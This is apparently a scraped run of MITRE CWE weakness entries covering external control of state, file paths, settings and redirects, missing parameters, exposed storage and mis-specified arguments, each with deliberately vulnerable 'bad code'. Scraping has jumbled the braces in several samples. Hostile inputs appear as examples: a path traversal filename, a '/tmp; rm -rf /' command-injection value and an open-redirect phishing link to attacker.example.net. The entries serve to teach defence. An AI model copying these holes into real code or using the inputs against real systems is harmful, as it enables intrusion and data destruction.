If a web product does not properly protect assumed-immutable values from modification in hidden form fields, parameters, cookies, or URLs, this can lead to modification of critical data. Web applications often mistakenly make the assumption that data passed to the client in hidden fields or cookies is not susceptible to tampering. Improper validation of data that are user-controllable can lead to the application processing incorrect, and often malicious, input. For example, custom cookies commonly store session data or persistent data across sessions. This kind of session data is normally involved in security related decisions on the server side, such as user authentication and access control. Thus, the cookies might contain sensitive data such as user credentials and privileges. This is a dangerous practice, as it can often lead to improper reliance on the value of the client-provided cookie by the server side application. This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Software Development" (View-699)
Relevant to the view "Architectural Concepts" (View-1008)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 In this example, a web application uses the value of a hidden form field (accountID) without having done any input validation because it was assumed to be immutable. (bad code)
Example Language: Java
String accountID = request.getParameter("accountID");
User user = getUserFromID(Long.parseLong(accountID)); Example 2 Hidden fields should not be trusted as secure parameters. An attacker can intercept and alter hidden fields in a post to the server as easily as user input fields. An attacker can simply parse the HTML for the substring: (bad code)
Example Language: HTML
<input type="hidden"
or even just "hidden". Hidden field values displayed later in the session, such as on the following page, can open a site up to cross-site scripting attacks. Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
Relationship
This is a primary weakness for many other weaknesses and functional consequences, including XSS, SQL injection, path disclosure, and file inclusion.
Theoretical
This is a technology-specific MAID problem.
CWE-642: External Control of Critical State Data
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe product stores security-critical state information about its users, or the product itself, in a location that is accessible to unauthorized actors.
If an attacker can modify the state information without detection, then it could be used to perform unauthorized actions or access unexpected resources, since the application programmer does not expect that the state can be changed. State information can be stored in various locations such as a cookie, in a hidden web form field, input parameter or argument, an environment variable, a database record, within a settings file, etc. All of these locations have the potential to be modified by an attacker. When this state information is used to control security or determine resource usage, then it may create a vulnerability. For example, an application may perform authentication, then save the state in an "authenticated=true" cookie. An attacker may simply create this cookie in order to bypass the authentication. This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Architectural Concepts" (View-1008)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 In the following example, an authentication flag is read from a browser cookie, thus allowing for external control of user state data. (bad code)
Example Language: Java
Cookie[] cookies = request.getCookies();
for (int i =0; i< cookies.length; i++) { Cookie c = cookies[i]; }if (c.getName().equals("authenticated") && Boolean.TRUE.equals(c.getValue())) { authenticated = true; }Example 2 The following code uses input from an HTTP request to create a file name. The programmer has not considered the possibility that an attacker could provide a file name such as "../../tomcat/conf/server.xml", which causes the application to delete one of its own configuration files (CWE-22). (bad code)
Example Language: Java
String rName = request.getParameter("reportName");
File rFile = new File("/usr/local/apfr/reports/" + rName); ... rFile.delete(); Example 3 The following code uses input from a configuration file to determine which file to open and echo back to the user. If the program runs with privileges and malicious users can change the configuration file, they can use the program to read any file on the system that ends with the extension .txt. (bad code)
Example Language: Java
fis = new FileInputStream(cfg.getProperty("sub")+".txt");
amt = fis.read(arr); out.println(arr); Example 4 This program is intended to execute a command that lists the contents of a restricted directory, then performs other actions. Assume that it runs with setuid privileges in order to bypass the permissions check by the operating system. (bad code)
Example Language: C
#define DIR "/restricted/directory"
char cmd[500]; sprintf(cmd, "ls -l %480s", DIR); /* Raise privileges to those needed for accessing DIR. */ RaisePrivileges(...); system(cmd); DropPrivileges(...); ... This code may look harmless at first, since both the directory and the command are set to fixed values that the attacker can't control. The attacker can only see the contents for DIR, which is the intended program behavior. Finally, the programmer is also careful to limit the code that executes with raised privileges. However, because the program does not modify the PATH environment variable, the following attack would work: (attack code)
Example 5 The following code segment implements a basic server that uses the "ls" program to perform a directory listing of the directory that is listed in the "HOMEDIR" environment variable. The code intends to allow the user to specify an alternate "LANG" environment variable. This causes "ls" to customize its output based on a given language, which is an important capability when supporting internationalization. (bad code)
Example Language: Perl
$ENV{"HOMEDIR"} = "/home/mydir/public/";
my $stream = AcceptUntrustedInputStream(); while (<$stream>) { chomp;
if (/^ENV ([\w\_]+) (.*)/) { $ENV{$1} = $2; }elsif (/^QUIT/) { ... } elsif (/^LIST/) { open($fh, "/bin/ls -l $ENV{HOMEDIR}|"); }while (<$fh>) { SendOutput($stream, "FILEINFO: $_"); }close($fh); The programmer takes care to call a specific "ls" program and sets the HOMEDIR to a fixed value. However, an attacker can use a command such as "ENV HOMEDIR /secret/directory" to specify an alternate directory, enabling a path traversal attack (CWE-22). At the same time, other attacks are enabled as well, such as OS command injection (CWE-78) by setting HOMEDIR to a value such as "/tmp; rm -rf /". In this case, the programmer never intends for HOMEDIR to be modified, so input validation for HOMEDIR is not the solution. A partial solution would be an allowlist that only allows the LANG variable to be specified in the ENV command. Alternately, assuming this is an authenticated user, the language could be stored in a local file so that no ENV command at all would be needed. While this example may not appear realistic, this type of problem shows up in code fairly frequently. See CVE-1999-0073 in the observed examples for a real-world example with similar behaviors. Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
CWE-73: External Control of File Name or Path
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe product allows user input to control or influence paths or file names that are used in filesystem operations.
This could allow an attacker to access or modify system files or other files that are critical to the application. Path manipulation errors occur when the following two conditions are met: 1. An attacker can specify a path used in an operation on the filesystem.
2. By specifying the resource, the attacker gains a capability that would not otherwise be permitted.
For example, the program may give the attacker the ability to overwrite the specified file or run with a configuration controlled by the attacker. This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Software Development" (View-699)
Relevant to the view "Architectural Concepts" (View-1008)
Relevant to the view "Seven Pernicious Kingdoms" (View-700)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 The following code uses input from an HTTP request to create a file name. The programmer has not considered the possibility that an attacker could provide a file name such as "../../tomcat/conf/server.xml", which causes the application to delete one of its own configuration files (CWE-22). (bad code)
Example Language: Java
String rName = request.getParameter("reportName");
File rFile = new File("/usr/local/apfr/reports/" + rName); ... rFile.delete(); Example 2 The following code uses input from a configuration file to determine which file to open and echo back to the user. If the program runs with privileges and malicious users can change the configuration file, they can use the program to read any file on the system that ends with the extension .txt. (bad code)
Example Language: Java
fis = new FileInputStream(cfg.getProperty("sub")+".txt");
amt = fis.read(arr); out.println(arr); Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
Relationship The external control of filenames can be the primary link in chains with other file-related weaknesses, as seen in the CanPrecede relationships. This is because software systems use files for many different purposes: to execute programs, load code libraries, to store application data, to store configuration settings, record temporary data, act as signals or semaphores to other processes, etc. However, those weaknesses do not always require external control. For example, link-following weaknesses (CWE-59) often involve pathnames that are not controllable by the attacker at all. The external control can be resultant from other issues. For example, in PHP applications, the register_globals setting can allow an attacker to modify variables that the programmer thought were immutable, enabling file inclusion (CWE-98) and path traversal (CWE-22). Operating with excessive privileges (CWE-250) might allow an attacker to specify an input filename that is not directly readable by the attacker, but is accessible to the privileged program. A buffer overflow (CWE-119) might give an attacker control over nearby memory locations that are related to pathnames, but were not directly modifiable by the attacker.
CWE-15: External Control of System or Configuration Setting
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterOne or more system settings or configuration elements can be externally controlled by a user.
Allowing external control of system settings can disrupt service or cause an application to behave in unexpected, and potentially malicious ways.
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Software Development" (View-699)
Relevant to the view "Architectural Concepts" (View-1008)
Relevant to the view "Seven Pernicious Kingdoms" (View-700)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 The following C code accepts a number as one of its command line parameters and sets it as the host ID of the current machine. (bad code)
Example Language: C
...
sethostid(argv[1]); ... Although a process must be privileged to successfully invoke sethostid(), unprivileged users may be able to invoke the program. The code in this example allows user input to directly control the value of a system setting. If an attacker provides a malicious value for host ID, the attacker can misidentify the affected machine on the network or cause other unintended behavior. Example 2 The following Java code snippet reads a string from an HttpServletRequest and sets it as the active catalog for a database Connection. (bad code)
Example Language: Java
...
conn.setCatalog(request.getParameter("catalog")); ... In this example, an attacker could cause an error by providing a nonexistent catalog name or connect to an unauthorized portion of the database.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
CWE-454: External Initialization of Trusted Variables or Data Stores
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe product initializes critical internal variables or data stores using inputs that can be modified by untrusted actors.
A product system should be reluctant to trust variables that have been initialized outside of its trust boundary, especially if they are initialized by users. The variables may have been initialized incorrectly. If an attacker can initialize the variable, then they can influence what the vulnerable system will do.
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Software Development" (View-699)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 In the Java example below, a system property controls the debug level of the application. (bad code)
Example Language: Java
int debugLevel = Integer.getInteger("com.domain.application.debugLevel").intValue();
If an attacker is able to modify the system property, then it may be possible to coax the application into divulging sensitive information by virtue of the fact that additional debug information is printed/exposed as the debug level increases. Example 2 This code checks the HTTP POST request for a debug switch, and enables a debug mode if the switch is set. (bad code)
Example Language: PHP
$debugEnabled = false;
if ($_POST["debug"] == "true"){ $debugEnabled = true; }/.../ function login($username, $password){ if($debugEnabled){ }echo 'Debug Activated'; }phpinfo(); $isAdmin = True; return True; Any user can activate the debug mode, gaining administrator privileges. An attacker may also use the information printed by the phpinfo() function to further exploit the system. . This example also exhibits Information Exposure Through Debug Information (CWE-215) Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
Relationship
Overlaps Missing variable initialization, especially in PHP.
Applicable Platform This is often found in PHP due to register_globals and the common practice of storing library/include files under the web document root so that they are available using a direct request.
CWE-610: Externally Controlled Reference to a Resource in Another Sphere
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe product uses an externally controlled name or reference that resolves to a resource that is outside of the intended control sphere.
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Weaknesses for Simplified Mapping of Published Vulnerabilities" (View-1003)
Relevant to the view "Architectural Concepts" (View-1008)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 The following code is a Java servlet that will receive a GET request with a url parameter in the request to redirect the browser to the address specified in the url parameter. The servlet will retrieve the url parameter value from the request and send a response to redirect the browser to the url address. (bad code)
Example Language: Java
public class RedirectServlet extends HttpServlet {
protected void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
String query = request.getQueryString(); }if (query.contains("url")) { String url = request.getParameter("url"); }response.sendRedirect(url); The problem with this Java servlet code is that an attacker could use the RedirectServlet as part of an e-mail phishing scam to redirect users to a malicious site. An attacker could send an HTML formatted e-mail directing the user to log into their account by including in the e-mail the following link: (attack code)
Example Language: HTML
<a href="http://bank.example.com/redirect?url=http://attacker.example.net">Click here to log in</a>
The user may assume that the link is safe since the URL starts with their trusted bank, bank.example.com. However, the user will then be redirected to the attacker's web site (attacker.example.net) which the attacker may have made to appear very similar to bank.example.com. The user may then unwittingly enter credentials into the attacker's web page and compromise their bank account. A Java servlet should never redirect a user to a URL without verifying that the redirect address is a trusted site. Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
Relationship
This is a general class of weakness, but most research is focused on more specialized cases, such as path traversal (CWE-22) and symlink following (CWE-61). A symbolic link has a name; in general, it appears like any other file in the file system. However, the link includes a reference to another file, often in another directory - perhaps in another sphere of control. Many common library functions that accept filenames will "follow" a symbolic link and use the link's target instead.
Maintenance
The relationship between CWE-99 and CWE-610 needs further investigation and clarification. They might be duplicates. CWE-99 "Resource Injection," as originally defined in Seven Pernicious Kingdoms taxonomy, emphasizes the "identifier used to access a system resource" such as a file name or port number, yet it explicitly states that the "resource injection" term does not apply to "path manipulation," which effectively identifies the path at which a resource can be found and could be considered to be one aspect of a resource identifier. Also, CWE-610 effectively covers any type of resource, whether that resource is at the system layer, the application layer, or the code layer.
CWE-234: Failure to Handle Missing Parameter
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterIf too few arguments are sent to a function, the function will still pop the expected number of arguments from the stack. Potentially, a variable number of arguments could be exhausted in a function as well.
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 The following example demonstrates the weakness. (bad code)
Example Language: C
foo_funct(one, two);
void foo_funct(int one, int two, int three) { printf("1) %d\n2) %d\n3) %d\n", one, two, three); }(bad code)
Example Language: C
void some_function(int foo, ...) {
int a[3], i; }va_list ap; va_start(ap, foo); for (i = 0; i < sizeof(a) / sizeof(int); i++) a[i] = va_arg(ap, int); va_end(ap); int main(int argc, char *argv[]) { some_function(17, 42); }This can be exploited to disclose information with no work whatsoever. In fact, each time this function is run, it will print out the next 4 bytes on the stack after the two numbers sent to it. Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
Maintenance
This entry will be deprecated in a future version of CWE. The term "missing parameter" was used in both PLOVER and CLASP, with completely different meanings. However, data from both taxonomies was merged into this entry. In PLOVER, it was meant to cover malformed inputs that do not contain required parameters, such as a missing parameter in a CGI request. This entry's observed examples and classification came from PLOVER. However, the description, demonstrative example, and other information are derived from CLASP. They are related to an incorrect number of function arguments, which is already covered by CWE-685.
CWE-552: Files or Directories Accessible to External Parties
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe product makes files or directories accessible to unauthorized actors, even though they should not be.
Web servers, FTP servers, and similar servers may store a set of files underneath a "root" directory that is accessible to the server's users. Applications may store sensitive files underneath this root without also using access control to limit which users may request those files, if any. Alternately, an application might package multiple files or directories into an archive file (e.g., ZIP or tar), but the application might not exclude sensitive files that are underneath those directories. In cloud technologies and containers, this weakness might present itself in the form of misconfigured storage accounts that can be read or written by a public or anonymous user. This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Software Development" (View-699)
Relevant to the view "Weaknesses for Simplified Mapping of Published Vulnerabilities" (View-1003)
Relevant to the view "Architectural Concepts" (View-1008)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 The following Azure command updates the settings for a storage account: (bad code)
Example Language: Shell
az storage account update --name <storage-account> --resource-group <resource-group> --allow-blob-public-access true
However, "Allow Blob Public Access" is set to true, meaning that anonymous/public users can access blobs. The command could be modified to disable "Allow Blob Public Access" by setting it to false. (good code)
Example Language: Shell
az storage account update --name <storage-account> --resource-group <resource-group> --allow-blob-public-access false
Example 2 The following Google Cloud Storage command gets the settings for a storage account named 'BUCKET_NAME': (informative)
Example Language: Shell
gsutil iam get gs://BUCKET_NAME
Suppose the command returns the following result: (bad code)
Example Language: JSON
{
"bindings":[{
}
"members":[
},
"projectEditor: PROJECT-ID",
],"projectOwner: PROJECT-ID" "role":"roles/storage.legacyBucketOwner" {
"members":[
]
"allUsers",
}"projectViewer: PROJECT-ID" ], "role":"roles/storage.legacyBucketReader" This result includes the "allUsers" or IAM role added as members, causing this policy configuration to allow public access to cloud storage resources. There would be a similar concern if "allAuthenticatedUsers" was present. The command could be modified to remove "allUsers" and/or "allAuthenticatedUsers" as follows: (good code)
Example Language: Shell
gsutil iam ch -d allUsers gs://BUCKET_NAME
gsutil iam ch -d allAuthenticatedUsers gs://BUCKET_NAME Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
CWE-628: Function Call with Incorrectly Specified Arguments
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe product calls a function, procedure, or routine with arguments that are not correctly specified, leading to always-incorrect behavior and resultant weaknesses.
There are multiple ways in which this weakness can be introduced, including:
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Software Development" (View-699)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 The following PHP method authenticates a user given a username/password combination but is called with the parameters in reverse order. (bad code)
Example Language: PHP
function authenticate($username, $password) {
// authenticate user ... authenticate($_POST['password'], $_POST['username']); Example 2 This Perl code intends to record whether a user authenticated successfully or not, and to exit if the user fails to authenticate. However, when it calls ReportAuth(), the third argument is specified as 0 instead of 1, so it does not exit. (bad code)
Example Language: Perl
sub ReportAuth {
my ($username, $result, $fatal) = @_; }PrintLog("auth: username=%s, result=%d", $username, $result); if (($result ne "success") && $fatal) { die "Failed!\n"; }sub PrivilegedFunc { my $result = CheckAuth($username); }ReportAuth($username, $result, 0); DoReallyImportantStuff(); Example 3 In the following Java snippet, the accessGranted() method is accidentally called with the static ADMIN_ROLES array rather than the user roles. (bad code)
Example Language: Java
private static final String[] ADMIN_ROLES = ...;
public boolean void accessGranted(String resource, String user) { String[] userRoles = getUserRoles(user); }return accessGranted(resource, ADMIN_ROLES); private boolean void accessGranted(String resource, String[] userRoles) { // grant or deny access based on user roles ... Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
CWE-209: Generation of Error Message Containing Sensitive Information
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom Filter This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
